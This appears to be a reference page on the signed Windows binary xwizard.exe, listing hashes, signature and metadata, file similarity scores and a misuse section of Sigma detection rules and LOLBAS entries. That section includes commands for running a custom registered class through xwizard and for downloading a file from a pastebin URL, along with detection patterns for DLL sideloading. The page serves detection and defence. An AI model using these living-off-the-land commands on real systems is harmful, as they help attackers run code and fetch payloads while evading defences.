xwizard.exe

  • File Path: C:\WINDOWS\SysWOW64\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 CB72CA2B130AA4B776FAF32E18453CF6
SHA1 9B7E63B9B203149434F3399C4F50CF4C90156E14
SHA256 E8C5AB5C641D902D7ED9CBEA6434A218728A7D4A07F7C330975C4F66EC7AE453
SHA384 B8EDF55FD8F599028E6968FC28E6487AD9A1BAC9E5453D94A8C3DFC6F236FB89EF56C0299918B9AFC7010966E036338D
SHA512 4B9F433F4208BB68601469081B577862D9400E1F2586ABD83339C61D62D0109C8D620F365F8ABC2B71460795551B3A3C57E2847DC11A43E3A78C7AFB36E61DF0
SSDEEP 1536:iQTiHGLIKWDivTndURDoq4OZZZLlCIib:rTkGsDiLnSRD68wb

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 54
C:\WINDOWS\system32\ComputerDefaults.exe 54
C:\WINDOWS\system32\ComputerDefaults.exe 57
C:\Windows\system32\ComputerDefaults.exe 55
C:\windows\system32\ComputerDefaults.exe 66
C:\Windows\system32\ComputerDefaults.exe 47
C:\Windows\system32\xwizard.exe 52
C:\windows\system32\xwizard.exe 57
C:\Windows\system32\xwizard.exe 47
C:\WINDOWS\system32\xwizard.exe 55
C:\WINDOWS\system32\xwizard.exe 50
C:\Windows\system32\xwizard.exe 54
C:\windows\SysWOW64\ComputerDefaults.exe 60
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 46
C:\Windows\SysWOW64\ComputerDefaults.exe 63
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 41
C:\Windows\SysWOW64\ComputerDefaults.exe 50
C:\Windows\SysWOW64\ComputerDefaults.exe 50
C:\WINDOWS\SysWOW64\xwizard.exe 55
C:\Windows\SysWOW64\xwizard.exe 63
C:\Windows\SysWOW64\xwizard.exe 69
C:\windows\SysWOW64\xwizard.exe 54
C:\Windows\SysWOW64\xwizard.exe 57

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.